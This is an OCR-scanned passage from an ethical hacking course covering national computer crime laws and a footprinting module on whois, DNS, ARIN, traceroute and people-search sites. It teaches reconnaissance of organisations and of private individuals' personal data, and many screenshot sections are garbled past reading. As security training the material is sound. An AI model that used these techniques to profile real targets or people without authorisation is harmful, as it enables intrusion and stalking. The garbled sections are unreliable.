are such that the commission of the further offense is i mpossi ble. 
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United Kingdom's Cyber Laws 



(8) A person guilty of an offense under this section shall beliable 

(a) on sunnnnary conviction, to imprisonmentfor aternn not exceeding the 
statutory maximum or to both; and 

(b) on conviction on indictment, to imprisonment for a term not exceeding 
five years or to a fi ne or to both 

(9) A person is gui Ity of an offense if - 

(a) hedoesany act which causes an unauthorized modification of the 
contents of any computer; and - 

( b) at the ti me when he does the act he has the requi si te i ntent and the 
requisite knowledge. 

(10) For the purposes of subsection (l)(b) abovethe requisite intent is an 
i ntent to cause a modif i cati on of the contents of any and by so doi ng - 

(a) to impair the operation of any computer; 

(b) to prevent or hi nder access to any program or data held i n any 
computer; or 

(c) to impair the operation of any such program or the reliability of 
any such data 
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Australia's Cyber Laws 



According to CYBERCRI ME ACT 2001 

The Cyber cri me Act 200 1 amended the Cri mi nal Code Act 
1995 to replace existi ng outdated computer offences. 

A person is gui Ity of an offence if: 

(a) the person causes any unauthorized access to, or 
nnodifi cation of, restricted data 

(b) the person i ntends to cause the access or 
nnodifi cation 

(c) the person knows that the access or modification is 
unauthorized 

(d) one or nnore of the foil owing applies: 

( I ) the restri cted data 1 s he! di n a Commonweal th 
computer 

(II) the restri cted data is held on behalf of the 
Commonwealth 

(III) the access to, or modification of, the restricted data is 
caused by means of a telecommunications service 

Penalty: 2 years imprisonment 
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Germany's Cyber Laws 



Penal Code Section 202a. Data Espionage: 

(1) Any person who obtains without authorization, 
for hi mself or for another, data which are not 
meant for him and which are specially protected 
against unauthorized access, shall be liable to 
i mprisonment for a term not exceed i ng three years 
or to a fine. 

(2) Data within the meaning of subsection lare 
only such as are stored or transmitted 
electronically or magnetically or in anyform not 
directly visible. 

Penal Code Section 303a: Alteration of Data 

(1) Any person who unlawfully erases, suppresses, 
renders useless, or alters data (section 202a(2)) 
shall beliableto i mprisonment for a term not 
exceedi ng two years or to a f i ne. 

(2) The attempt shal I be punishable. 
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Si ngapore's Cyber Laws 



Chapter 50 A: Computer misuse Act. 

Section 3 - (1) Any person who l<nowingly causes a 
computer to perfornn any function for the purpose of 
securing access without authority, shall be liable on 
conviction to a fine not exceeding $ 5.000 or to 
i nnprisonnnent for a term not exceedi ng 2 years or to both. 

(2) I f any damage is caused as a restut of an 
offence under this section, a person convicted of the offence 
shall be liableto a fine not exceeding $ 50.000 or to 
i mprisonment for a term not exceedi ng 7 years or to both 

Secti on 4: Access with i ntent to commit or faci I itate 
commission of offence 

(1) This section shall apply to an offence 
involving property, fraud, dishonesty or which causes 
bodily harm and which is punishable on conviction with 
i mprisonment for a term of not less than 2 years. 

(2) Any person guilty of an offence under this 
section shall be liable on conviction to a not exceeding $ 
50.000 or to imprisonment for a term not exceeding 10 
years or to both 
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Summary 



© Security is critical across sectors and industries. 

© Ethical Hacking is a methodology to simulate a 
malicious attack without causing damage. 

© Hacking involves five distinct phases. 

© Security evaluation includes preparation, conduct, and 
evaluation phases. 

© Cyber cr i me can be d i ff erenti ated i nto two categor i es. 

© U.S. Statutes 1029 and 1030 primarily address cyber 
cri me. 
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Ethical Hacking 



Module 1 1 
Footprinting 



Scenario 



I 



J 'Adam isfurious. Hehad applied for the network 
engineerjobattargetcompany.com. Hebelieves 
that hewasrejected unfairly. Hehasa good track 
record, but the economic slowdown has caused 
many layoffs, including his. He is frustrated - he 
needs a job and feels he has been wronged. Late in 
the evening he decides that hewill prove his mettle. 

© What do you think Adam would do? 

© Where would he start and how would he go about it? 

© Are there any tools that can help him in his effort? 

© Can he cause harm to targetcompany.com? 

© As a security professional, where can you lay checkpoints and how 
can you deploy countermeasures? 
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Module Objectives 



© Overview of the Reconnaissance Phase 

© IntroducingFootprinting 

© Understanding the Information Gathering 
M ethodology of H acl<ers 

© Comprehending the Implications 

© Learning Some of the Tools Used for the 
Reconnaissance Phase 

© Deploying Counter measures 
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Revisiting Reconnaissance 




© Reconnaissance refers to 
the preparatory phase 
where an attacker seeks 
to gather as much 
information as possible 
about a target of 
evaluation prior to 
launching an attack. 

© It involves network 
scanning, either external 
or internal, without 
authorization. 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Defining Footprint! ng 



I 



© F ootpri nti ng i s the bl uepri nti ng of 
the security profi le of an 
organization, undertal<en in a 
methodological manner. 

© F ootpri nti ng i s one of the three 
pre-attack phases. The others are 
scanning and enumeration. 

©An attacker wi 1 1 spend 90% of the 
ti me i n profi I i ng an organ i zati on and 
wi 1 1 spend 10% of the ti me i n 
launchi ng the attack. 

©Footprinting results in a unique 
organization profile with respect to 
networks (Internet/ 
intranet/ extranet/ wireless) and 
systems involved. 
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I nformation Gathering Methodology 



©Unearth initial information 
©Locate the network range 
©Ascertai n active machi nes 
©Discover open ports/ access points 
©Detect operating systems 
©Uncover services on ports 
©Map thenetworl< 
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Unearthing Initial Information 



©Commonly includes: 

• Donnain nannelool<up 

• Locations 

• Contacts (telephone/ 
mail) 

©I nformatlon sources: 

• Open source 

• Whois 

• Nslookup 

©Hacking tool 
©Sam Spade 



St Spade - Script Console 




Tools 



Zone Transfer. . . 
SMTP Relay check. . . 
Scan Addresses. ■■ 
Crawl website ,.■ 
Browse web. . . 
Check cancels. . . 
Fast traceroute 
Slow traceroute 
S-lang command. . . 
Decode URL... 
Parse email headers... 



Ping 

nslookjup 
Whois 
IP Block 
Dig 

Traceroute 
Finger 
5MTP Verify 
Time 
BlackJist 
Abuse Lookup 
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Finding Company's URL 



© Search for a company's U RL usi ng a search 
engi ne such as www.gooqle.conn . 

© Type the company's name i n the search engi ne 
togetthecompanyURL. 

- - - - --- - - - > . . . . . . . . . . y y y y y y y y y y y y y y y J 
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Internal URL 



© By taking a guess, you may find an internal 
company URL. 

• Forexamplejntranet.xsecurity.com 

© You can gain access to internal resources by 
typing an internal URL. 

• For example, beta.example.com 
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Extract! ng Archive Of a Website 



© You can get information on a company website 
from tlie ti me tliat it was launcliea at 
www.archive.orq 

• For example, www.eccouncil.org 

© You can see updates made to tlie website, to 
date. 
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Google Search for Company's I nfo. 



©Using Google, search company news and press 
releases. 

© From this information, get the company's 
infrastructure details. 
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People Search 



© People search can be used to find personal information 

• For example http://people.yahoo.com 

• For example, http://www.intellius.com 

© You can get detai I s I i ke resi denti al addresses, contact 
numbers, date of birth, change of location, etc. 

© You can get satellite pictures of private residences. 
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People Search Website 

[^hl:l:p://nnd.inl:elius.cQm/eHample-backgrQundl.php? - Microsoft Internet EHplorer 



Background Report - April 25, 2005 



Summary 


Name 


Joe Smith 


Aliases 


1) Smithj Joe, E 

2) Smithj JosephjE 

3) Smithj Smitty, E 


1 Address 


4230 THE WOODY DR. , APT 1230 
San Jose, CA 95136 


Date Of Birth 


06/04/74 


Age 


29 




Reports 


• Address History 


• Single State Criminal Check 


• Single State Civil Judgments 


• Neighbor Report 


• Relatives and Associates Report 


• Property Information 


• Neighborhood Report 


• Federal License Check 
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Satellite Pictureof a Residence 




http:/ / www. bestpeopi esearch .com 

(For reference only - This slide is not in your courseware) 



Be&tPeoplaSearoh. oQm 

''■Our Name A^ya it all* 



All Searches 
Our Guarantee 
FAQS 

About us 
contact us 
Link Exchange 



Have a Phone 
Niunbei? 

Heed a Name and 
Addiess? 

ClicK nere! 



Need Assistance? 

Call us 
760-652-4050 
M-Fi 9am-4pm PT 



Home I Help | Login — 



Quick Search 



Welcome to BestPeopleSearch.com 

Dcn't settle for cut dated online instant people search information. Use Best People Search to hire a real live 
private investigator. Through our unique sen-nce^ you are hiring a licensed^ bonded^ insured^ private 
investigator to research and obtain actual up to date information. Your search requests are automaticallv 
assigned to prescreened experienced Private Investigators. Review the various people searches below or 
choose from an alphabetically sorted list of 'All People Searches'. If you have any questions about what to 
crder^ please contact us first. To read about what our customers say click here. 



People Search by 
Name 

• Basic People Search 

• Comprehensive People Search 

• Find Current Address (Private 
Eye Verified) 

• Find Address and Phone numbers 

(w/SSN) 

• Find Address and Phone numbers 
(w/out SSN) 

• Cell phone number search / 
lookup (w/SSN) 

• Cell phone number search / 
lookup (w/Qut SSN) 

• Employment Search 

• Employment Search (w/out SSN) 

Search by Phone 
Number 

• Reverse Phone Number Lockup 
(CNA) 

• Reverse Cell Phone Lockup (Cell 
CNA) 

• Cell Phone Number Reverse 
Loakup - Plus (Cell CNA+) 



People Search by 
Address 

• Reverse Address Lookup (name, 
phone from address) 

• Comprehensive People Search 

• Basic People Search 

• Reverse Private Mail Box Lookup 
(PMB) 

• PO Box Search (Reverse P.O. Box 
Lookup) 

• Cell phone number search / 
lookup (w/SSN) 

• Cell phone number search / 
lookup (w/out SSN) 

Search by Cell Phone 
Number 

• Reverse Cell Phone Lookup (Cell 
CNA) 

• Cell Phone Number Reverse 
Lookup - Plus (Cell CNA+) 

• Name and Address from 
Disconnected Cell Phone 

• Cell Phone Records - 100 Calls 
with Dates (w/SSN) 




Live Private^ 
nv-esti gators 
^arch for 
Current and 

Accurate 
Infonnati on J 




1. FREE £ = d3l S€CL 
Wumbtr VerificatiEjn 

2. tome a. Address from Ctll 
numb&r [Reverse Cell phone 
I Dcku pj 

3. Niame S. Address Irum 
Unlisted Mumber (Reverse 
phone locftup) 

4. Basic People Searcli 

5. Cell Phone Re^arch 

6. Comprehensive 
Backgrcund Chedt 

7. Reverse Address Lookup 
(phE:ne # at address) 

S. Place Df Employment 
Search 

9. Cell Phone Mumber 
Search (find someone ? cell 
#) 

10. Verified Current Address 
Search 
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http:/ / www. peopi esearchamer i ca.com 

(For reference only - This slide is not in your courseware) 




I Home I I User Agreement | | Refund Policy | | Contact Us | | Sitemap 



USA Cell Tolls 
Reverse Cell Phone 
Internat Cell Tolls 
Find Cell Phone 
Reverse VOIP 
VOIP Broadband Toll^ 
Reverse Unlisted # 
Unlisted Number 

Landline Tolls 
Reverse Address 
DMVTagA/IN Search 
Reverse Driver License 

Property Search 
Background Searches 
Date of Birth 
People Report 
Advanced Report 
Free SSN Tool 
Free Phone Tool 
Free Inmate Search 
Instant Search i 
Batch Search 
Partner Links 



Blobal Phone / Cellular/ VOIP Broadband Phone Research Sen/ices. Asset Location, and 
Background Checks 



These =6arca£: mo'.ude per 
S'Earcli- public rtwi'rd; searc.i 



ris\ ar:dbij: jne= = la^atian inf-iMmati^in real time Ian 
nd a;;et&- csurt searches both criminal and civil- alot 
EJiperienM and teDhn-slogy to your advantage! 



ine/Dellph«ne; VOIP Broadband 
v. ith real -Estate inf-srmation. Putoi 



Select a Search Categoty Picture Below 



Cell Phone / V.O.LP. Number Research 





Landline Phone Number Research 



Address Research 




People Search Reports 
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http://www.datatraceusa.com 

(For reference only - This slide is not in your courseware) 





WeLcome To Data Trace USA] 



Data Trace USA'"'' is -1 source for 
today's information solutions, 

Working togetiier witii top^eading 
banking institutionSr collection 
agendeSr law enfbrcementagendes, 
credit card companies r phone 
companieSr e-commerce solutions, and 
many more. 

Data Trace USA^ is dedicated to 
providing accurate ^ precise and 
dependable information within hours. 
We guarantee fast results or your 
money back!! 



PHOME TRACE 



IDENTITY TRACE 



OTHER TRACE 



NO INFO - 
NO CHARGE 

ASK VS ^ QUESTION 



ACURATE & DEPENDABLE 
RESULTS WITH IN HOURS! 



FOR MORE INFO CALL US TOLL-FREE 
800-920-7211 



1^ lOOVo 
Confidential 
'j^^^ i^d more ^ 



I r u « T ,Ti We Are 

LIV E^ Currerdy 
VC: - Unavailable 

Uve G3iat G4fr Rtpr^sE-ntative 
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http://www.switchboard.com 

(For reference only - This slide is not in your courseware) 



Switchboard'' 

it's the Yeliow Pages. £/&cf«ffetf.^ 



RHP A BUSINESS | FIND A PERSON | SEARCH BY PHQHE [, W EB SEARCH | AREA & ZIP CODES | MAPS/DIRECTIONS | 



White Pages 

First Name 



htelp 



1 



* Last Name 



City 



State List 



or Zip 



* Required 



Search 



7 



<Ha Reoent SE-ardies> 
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http://www.discreetresearch.com 

(For reference only - This slide is not in your courseware) 




SIGN IP 


HMTiS 


VnUmflffU 


Tnnvrs 











CDHTMTUS 




LOGIN NOW 



Welcome 




public records 



LostYour Pas-sivord? 

Enter Your E-Mail AddrsEE Here: 

Submit 



AJI searches are corrfidential 
Access to billions of records 
Fast Friendly Service 
Ho monthly fee 



LOCATE PEOPLE SEARCHES IS 



Order Online - By Fax - By Postal Mail 
" Click On A Search For Details " 



SSN Trace 
3SN Trace Plus 
Name ('•latch Search 
PO Box Trace 
Florida Package 
Nationwide Package 
California Package 
Date of Birth Locate 
Employment Locate Search 



BUSINESS SEARCHES ' ^S^ 



Business Credit Report 
Business Summan/ 
Nationwide Business Filings 
Bankruptcy Search 
Comttined Search 
Real Property Search 



CIVIL RECORDS 

Bankruptcy Search 
Combined Search 



PHOHESEARCHES 



Name & Address from Unlisted Phone Number Search 

Name & Phone Number From Address 

Name & Address from Disconnected Phone Number 

Name & Address from Toll Free Number or Pay Phone [USA) 

Name S Address from "Active" Pager/Voicemail (USA) 

Name & Address from Disconnected Pager/Voicemail (USA; 

Residential Long Distance Bill 

Name & Address From Cell Number 

Locate Cell Number by Name & Address 

Name & Address from Disconnected Cell Number fUSA) 

Cell Monthly Report of Call Activity 

Cell Phone Mumher History 
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Foot Printing Through J ob Sites 



© Company i nfrastructure detai Is can 
be gathered from job posti ngs. 

• E.g., www.jobsdb.com 

© J ob requirements 
© Employee profile 
© Hardware information 
© Software information 
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Foot Printing Through J ob Sites 



JobsDB.co[ii 



[BEJmElDlEIB 




Home :: About Us :: Press Room :: Events :: Career@JobsDB :: Contact Us 



TO GETTING THE BSSIT JOB 
IS HAVING THE BSW CV 



$87.00^ 



D Job Se€?ke£ r Login 
Username; | 



Password; | 
Location; | USA 
Submit 



~I1 



Reset 



*■ Forgot Password 



Takia £1 taur an MyJiribsDB 



Daily Job Alert Emailj One Click Quick Apply^ Online 
Cover Letter^ Be Head Hunted by Employers and 
more. . . . 



Quick Search : 




Jobs by Country 



USA 

Indonesia 
Singapore 



Australia 

Korea 

Taiwan 



Hong Kong 

Malaysia 

Thailand 



India 

Philippines 



Jobs by Category 



Accounting 

Recruitment Consultancy 
Marketing 



Administrative/Secretarial 
General Management 
Retail/Wholesale 



Banking/Finance 
I.T. 

Telecommunications 



Engineering 

Manufacturing/Production 
Sales 

D Advance Search 



SS JobsDB Resources For Job Seekers 



Career Tips 

*^ • what do the employers look for in job seekers? 
.Should I continue Studvina? 
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Interview Advise 

Gain confidence in job interviews 
Other Useful Links 
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Foot Printing Through J ob Sites 



Designation 
Job Description 



Desired Profile 



Minimum Experience 



System Administrator / DBA (Position is based in U.S.A.) 
Tiiis position is based in Long Beacii U\, CA 

* We are iooi^ing for a System Administrator cum DataBase Administrator, who can tal<e care of one our Existing Account. 

*The Major role would be to do System Software Installations, Configurations and Monitoring the impact of building out of a 
number of environments from scratch. 

* Major interaction of this profile would be with QA Lead /Team in Deploying the code from one to another environment. 
Duration : 9 Months 

1) Strong AIX & Solaris System Admin Sl<ills 

2) Should be proficient in UNIX scripting and manual commands 

3) WebSphere ADMIN v5 required 

4) Configuration Management Tool experience (PVCS, CVS, etc.) 

5) Code deployment from one environment to another 
Perl Scripting 

6) Experience working with Hosting provider 

**The perfect choice would be somebody who has expereince in production environment with a Corporate Portal. 
Plus: 

* Certifications 

* Vignette a huge plus 

* Quality assurance on a WebSphere project 
*Vignette release management 

* Load testing tools (Mercury preferred.) 

2 years 
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Passive I nformation Gathering 



© To understand the current security status of a particular 
I nformation System, tlie organizations perform eitlier a 
Penetration Testing or otiier liacl<ing tecliniques. 

© Passive information gatliering is done by finding out tlie 
detai Is that are freely aval I able over the I nternet and by 
vari ous other techni ques without di recti y comi ng i n 
contact with the organization's servers. 

© Organizational and other informative websites are 
exceptions as the information gathering activities 
carried out by an attacker do not raise suspicion 
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Competitive I ntd ligence Gather! ng 



"Business moves fast. Product cycles are measured in months, not years. 
Partners become rivals quicker than you can say 'breach of contract.' So how 
can you possibly hope to keep up with your competitors if you can't keep an 
eye on them?" 

©Competitive i ntel I i gence gather i ng is the process of 
gathering information about your competitors from 
resources such as the I nternet 

©The competitive i ntel I i gence is non-i nterferi ng and 
subtle in nature 

©Competitive intelligence is both a product and process 
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Competitive I ntelligence Gathering (cont.) 



© The various issues involved in competitive 
intelligence are: 

• Data gathering 

• Data analysis 

• I nformation verification 

• I nformation security 

© Cognitive hacking: 

• Single source 

• Multiple source 
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Competitive I ntdligence Resource 
( www. cl seel<. com) 



httD://CISeeK.GOIII 

Tne CI RBSOurcB Index 



Gompetitiue InteliiDence 
RBSourises Cateaorized 



Stop searching. -Start Finding. TrllgHfflS 



Factiva, a Ckiw Jorjes & Reuters C 




oday. 



_'_lic^c EannerTc Learn More] 

Search and Categories 



I micro soft] 



Search 



A550c:iation5 (ysj 

Associations and 
Societies in tine field of 
CI and tine Like. 

Books related to the 
various topics found in 
CI activities. 

CTompanies i;i355;i 

Consulting. Market 
Research., Online 
Information and 

Databases. 



Advanced Search 

Education i;b9;i 

CI courses and training 
programs, certificates. 

CI and KM jobs. CI 
recruitment companies. 



Documentation C5Sl 



^^^^ 



Publications i;59) GI^S 

CI Pubs.; Newsletters, 
Journals and Magazines. 

Software (.3lz]i 

CI Systems Si. Portals; 
organize., gather., 
analyse., and share 
information . 



Articles., information 
and tLi to rials regarding 
CI. 



Fast Integration For Application 

n n n m f=nl- . Rf=r^H Rfannrt-n Pi Rf=v"if=vj^ 



C-o m p 61:11:1 ve 


Intell 


gen 


ize R e s o u raze Index 


- A s ea rrh e 


n g i n e 


and 


listing oF sites- by- 


categor-p' For 


Fin d i n 


g CI 


res our^ss . 


CIs e e l-c . :zo m 









Services 



Frs-s 

N &VJS I et±e 
Vour 
N a m e : 
"Vour 
Em ail: 



I Subscribe ^ I 

I 

I OK! I 



► Recommend 

► PopLilar links 

► CI Bookstand 

► Advertising 

► AleKa "Toolbar 



CI in the News 



Free Nev^ Feed= rcr Vcur 
"vV e b s i te 

FaadDiract 23 Apr 2005 
□ 3 :45 : □□ 



Frost &. Sullivan Honors Eest 
Practices Leaders 
Business Wire via Charlotte 
Obser\'er 2 3 Apr 5 
03 ;45 ; OO 



Frost G. Sullivan Honors Best 
Practices Leaders 
Business Wire via Providence 
Journal 2 3 Apr 2005 OSiSSiOO 
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Anacubis 



I 



©Competitive i ntel I i gence 
product Anacubis 
teclinol ogy a! I ows the user 
to quicl<ly locate all the 
information they need and 
produce a si ngl e vi ew of 
that information for 
analysis. 

©This helps highlights 
areas of potential threat or 
opportunity and 
competitors that warrant 
further scrutiny. 
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http://www.anacubis.com 
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Public and Private Websites 



© An company might maintain public and private 
websites for different levels of access 

© Footprint an organization's public www servers 

• Example: 

- www.xsecurity.com 

- www.xsecurity.net 

- www.xsecurity.net 

© Footprint an organization's sub domains (private) 

• Exannple: 

- http:// partners.xsecurity.conn 

- http://intranet.xsecurity.conri 

- http://channels.xsecurity.com 

- http://www2.xsecurity.com 
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Hacking Tools 



© Whois 

© Nslookup 

© ARIN 

© Neo Trace 

© Visual Route Trace 

© SmartWhois 

© eMailTrackerPro 

© Website watcher 
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Whois Lookup 



© With whois lool<up, you can get personal and 
contact i nf or mati on . 



For example, www.samspade.com 



wtials. 

yjhife |kc[uk( oil 



"2 I V^!t I 



«MHMidl.ar^ = I I 

CiAiUd Dfi; 14-[>l£-:n]1 ID IJ O&LTTf 
Ei^ki^fn DiVt. : 13. 13 D& UTC 

DbjrA'.dil Sliivll L7 Vhi'il 5liiiM ^^dFiUi 

l?Ci.]K->'-li| SlllHZ 

ROJK-T.!'! ClT Maw Torts 
FWignA'.iil ^ I ■ I Fi1Wmvr= ■- h^^ 

R4]tf.V4ll F.^ 1.?I3S43C3«] 
R^lbV-lil S((-^t rcilUIwCgKSCCiarid.Cirg 
.^dti^ ID: naSDVa^BftitiJid 

Jlr*jT^»^ I^J■■^TJ^r Flh-ii^ C\ m.-rw-JI 
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J 



Whois 



I 




Registrant : 

tar get company [ targe tcompany-DOU) 
IXY. Everest Blk A. Enclave 
Aineerpet 
Hyderabad 

Andrapradesh, 50003 8 



Domain Name : targetcom^any 





r^rT|||ini il I iil nrr f'mit irt : 

H****, J*** [RJXX2-0RG) tarffetcoiiiBany@HI>l 

tar get company 

Everest Block, A. Enclave, 
Ameerpet 

Hyderatiad, Andrapradesh 50003S 

IN 91 40 XXXX 329X Fax- 91 40 XXXX 32gX 

Technical Contact: 

S*****, V**** (V3XX) techcontactgWEBIMDIA. COM 

SXX3 Inc 



Hoffman Estates, IL 60194 

US. 408/:;xx-x:;xx 40s/xsx-xx:;x 

Record expires on 14-Oct-200K. 
Record created on 13-Oct-1997.| 

Dfitdbese 1^^^. upd^i-^r} nr, m-4q-n4 EST 




Registrant: 

targetcompany (targetcompany-DOM ) 
# Street Address 
City, Province 
State, Pin, Country 

Domain Name: targetcompany.COM 



Administrative Contact: 

Surname, Nanne(SNI DNo-ORG) targetcompany@domain.com 
targetcompany (targetcompany- DOM ) # Street Address 
City, Province, State, Pin, Country 
Telephone: XXXXX Fax XXXXX 
Technical Contact: 

Surname, Name (SNI DNo-ORG) targetcompany@domain.com 
targetcompany (targetcompany- DOM ) # Street Address 
City, Province, State, Pin, Country 
Telephone: XXXXX Fax XXXXX 



Domain servers in listed order: 



NS1.WEBH0ST.COM 
NS2.WEBH0ST.COM 



XXX . XXX . XXX . XXX 
XXX . XXX . XXX . XXX 
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Nslookup 



© http://www.btinternet.eom/-simon.m.parker/l P- 
uti I s/ nsl ooku p_ down I oad . htm 

© Nslookup is a program to query I nternet domain name 
servers. Displays information that can be used to 
diagnose Domain Name System (DNS) infrastructure. 

© Helps find additional IP addresses if authoritative DNS 
is known from whois. 

©MX record reveals the I P of the mai I server. 

© Both Unix and Windows come with a Nslookup client. 

© Third party clients are also aval I able- for example, 
Sam Spade. 
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Extract DNS information 



© U si ng www.dnsstuff.conn , you can 
©ctract DNS information such as: 



M ai I server extensi ons 
I P addresses 

wwwvr>NSstuff,com 



si»ii-fa. IP c-iJt i-iur* ibn-d W 4^^IC iQ-hMr4iJHri_ 04riA E irij^- r-ik^bla< D^rb. rv^Ml irvzl PUS 











^pp U'^^tt' vti^imLiI^ip^ ■■Mill yivi Dl'^^ 


ii-jaluEA 








www- C?NSm> 0 rt c^fin. 




1 Loohiiit 1 


|gcco-i'iidI Ci*g |-^^: -|| 


1 Laakup 1 



^■Ek Wfni i>t''^-:iii DH^IhiUi^ 

1^ "T] LoaVijp I p 











r 





f tfitJlf.^ rffi> f-1 ^s^ IF" (Oi 4^tAiit 

wwoia I 



Ti-K Pin stiVlE i.<iil'jrt> l-li-k- i« ilu> li-K-T 
I Tracoft I 



■ WHas I 



I I^HC I r-i- vzmj; f. la^ nrpl --■'j £C.y hfri -rriifu^y DTdTi IP 
I l-ir^lCIily I 



1 IM'ir%fl>idU7t!(l»hiv 






.-.1. i:;r-£ 


.1 1- 
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Snapshot 



DNS Lookup: eccounciLorg MX record 

tieHC i^t± d ^iy iyvnvJirJlSshiif.gt]itt 

ScacchinB for cccouncii . ora MS cccocd at c >r Dcrt-scrvern . net [192.203.230.10]: Got referral to TLD1.II1TRJLDH3.NET, [todk 101 m 
SeocchliTifl for eccauncil . org HX eecatd ac TLD 1 . TTLTKADHS .WET. [201.74.112.1]; Got vtievcal cq Jl[inJ2 .HS .IfYI .WET. [taalt 41 m] 
Seatehihfl fet eeeouheil.ercr MS eeeeed AUTH2 .MS.NYI.HET. [46, 111, 15. LS'S] i Repetfts mull.eeeouheil.orcr. [toek SI ma) 

Ansuer : 





Type 


aass TTL 








360C|m!iil=cci;o™ctl,or,| [Prcfertrtce =^ 5] 


leccoufldLorg. 


[bTS 


[in 3600|aiilh2.ns.r[7i.iu:t 






IH 3^00 authl.ns.ii^.iiiiit. 




A 


Of ,|360O 





To sea the l>NS i;£:a.vei:3Si,lr te^ke sutice cha^ all MS serv^scs ate i^apsi^tLiig ^he co]:i:ec;^ nesuL^e, you cun Cllcfc Bmtm . 
Nott tl^Di chtat grcsMlts 9xm o\)tmiP^i$ j,n te^Jl-iltitc, tncai^ing T^tiai i;<l3ea« «v« not c;ech«a fttul^s. 

Tbese ces^dts ace tfhtit VilS resdlvers All Ovce the vocLd will see ligtit boh juisieas thtf hAve CUCbed irbfdfnintianl , 
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Scenario (cont.) 




Adam knows that targetcompany is based in NJ. 
However, he decides to check it. He runs a whoisfrom 
an online whois client and notes the domain information. 
He takes down the email IDs and phone numbers. He 
also discerns the domain server IPs and does an 
interactive Ns lookup. 

© Ideally, what information should berevealed to Adam during this 
quest? 

© Are there any other means of gaining information? Can he use the 
information at hand in order to obtain critical information? 

© What are the i mpl i cati ons for the target company? Can he cause 
harm to targetcompany at this stage? 
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Locate the Network Range 



I 



0 ConniTionly includes: 

©Finding the range of I P 
addresses 

©Discerning the subnet nnasl< 

© I nformation Sources: 

©ARIN (American Registry of 
Internet Nunnbers) 

©Traceroute 

© Hacking Tool : 

©NeoTrace 
©Visual Route 



30-2-0-0. pri ,lga4.us.ifitK;,net 
Response Time: 333 ms^""^-. 



JeaOllatlas 



g3-9,core01.|^2.a1las.cogBtLlco.corii pi 5-0. cored .cleaOllatlas.cogeri1co.com 

Respttnse Time: 425 ms '^-■^ Response Time: 421 ms 



64.1 24 51.1 86 cogertco.com 
Response Time: 421 ms 



|34-0 core02.clca01 atlas. cogontco. 
Response Time: 400 ms 



3.ba21 .b002281-1 .ordOl .atias.cogentco.c... pi 5-0. cored .mclOl .atlas.cdge.ri1co.com pi 4-0.core01 .dfwOI .atias.cogentco.com 
Response Time: 462 ms .._ Response Time: 421 ms"^--^ Response Time: 426 ms 




CAIRO 



TEHRAN 



::4fBU Dl 



MEXICC 






Name 


RTjms) 


Network 


Graph 










so-5-2-0,[rl,lgal,ys,mfni,net 


339 


















9 


64,125,30,17 


ABOVENET 


















208,185,0,246 


so-0-0-0,[rl,lga2,ys,mfni,net 


319 


ABOVENET-6 


















64,124,232,6 


so-2-0-0,prl,lga4,us,mfnx,net 


338 


ABOVENET 
















12 


64,124,51,186 


64, 124,51, 186,cogentco,™ 


421 


ABOVENET 
















13 


66,28,4,173 


g3-9,core01,jft02,aHas,cogentco,com 


425 


COGENT-NB-0000 
















14 


66,28,4,81 


p4-0,core02,dcaOl,atlas,cogentco,com 


400 


COGENT-NB-0000 
















15 


66,28,4,21 


pl5-0,core01,dcaOl,atlas,cogentco,com 


421 


COGENT-NB-0000 














16 


66,28,4,90 


pl4-0,core01,df«01,atlas,cogentco,com 


426 


COGENT-NB-0000 
















17 


66,28,4,26 


pl5-0,(:ore02,df«01,atlas,(:ogent[o,ram 


441 


COGENT-NB-0000 
















18 


66,28,4,38 


pl5-0,(:ore01,m(:i01,aHas,cogent[o,ram 


421 


COGENT-NB-0000 
















19 


66,28,4,34 


p5-0,(:ore02,ord01,aHas,togent(:[i,(:om 


467 


COGENT-NB-0000 
















20 


66,28,66,86 


g8,ba21,b002281-l,ord01,atlas,(:ogent[o,ram 


462 


COGENT-NB-0000 
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ARIN 



I 



© http://www.arin.net/wh 
ois/ 

© ARI N allows searches on 
the who! s database to 
locate information on 
networks autononnous 
system numbers (ASNs), 
network- related handles, 
and other related point 
of contact (POC). 

© ARIN whois allows 
queryi nq the I P address 
to hel p fi nd i nformati on 
on the strategy used for 
subnet addressing. 
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American Registry for Internet Numbers 

"Applying the principles of stewardshipj ARIN, a nonprofit corporation, allocates 
Internet Protocol resources; develops consensus-based policies; and facilitates the 
advancement of the Internet through information and educational outreach" 



Inside ARIN.NET 



Database 8t Template Conversion 
Information Center 





Registration 

How to get IPv4 and IPv6 addresseSj 
AS Numbers, and Transfer, Help Desk 
and Reassignment information 

Meetings 

Upcoming ARIN meetings and 
sponsorship information, Minutes 
from previous AC, BOT, PPM and 
Member's meetings 

Library 

r;i liHplinpc; Tpmnl;^1-ptn Fntrnc- FAn'cr 


Policy 

How ARIN Policy is made. Current 
Policy Discussions and policy proposal 
archive. 

Membership 

Information about member benefits, 
how to join as a non-subscriber, and 
a list of ARIN members, 










Internet Info 
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Screenshot: ARI N Whois Output 



Output from ARIN Whois 



ARIN Home Page ARIN Site Map ARIN Whois Help NEW! Database & Template Conversion Information Center 



Search for : 



Submit Query 



Search results for: 207.46.230.218 



Microsoft ( NETBLK-HICR050FT-GL0EAL-NET ) 
One Recimonci Way 
Redmonci, TJA 9S052 
US 

Netname: HICROSOFT-GLOE AL-NET 
Netblock: 207.4S.0.0 - 2 07.46.255.255 



Coordinator : 

Microsoft ( Z H3 9 — AR IM ) nocOrriicr osof t . com 
425-93 S-4200 

Domain System inverse mapping provided tiy: 

207 . 46 . 138 . 20 



DNS 1 . CP . HSFT . WET 
DNS2 . CP . HSFT. MET 
DNS 1 . TK . HSFT . NET 



207 . 46 . 138 . 2 1 
207. 46. 232 .37 



ARI N allows searches on 
the who! s database to I ocate 
IP A information on networks 
autonomous systenn 
numbers (ASNs), network- 
related handles, and other 
related poi nt of contact 
(POC). 
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Traceroute 



■ 



© Traceroute works by exploiting a feature of the I nternet 
Protocol called TTL, or Time To Live. 

© Traceroute reveals the path I P packets travel between two 
systenns by sendi ng out consecutive sets of U DP or I CM P 
packets with ever-increasingTTLs. 

© As each router processes an I P packet, it decrennents the 
TTL. When theTTL reaches zero, that router sends back a 
"TTL exceeded" message (using I CMP) to the originator. 

© Routers with reverse DNS entries may reveal the name of 
routers, network affiliation, and geographic location. 
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Tool : N eoTrace ( N ow M cAfee Vi sual Trace) 



File Edit View Help 



I Target p 



-'I ^ Go I 5 Map View ■■ f^IriFo Pane 



^'-□py ftr-.i 



1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 



S Ping "^Options % Online help 



.nfigure NeoTr-ace Online Manual F.A.Q. NeoWori^.cQm HackerWatc^ 



Neofrace 



# IP Address 



217,165,236,73 

213,42,12,11 

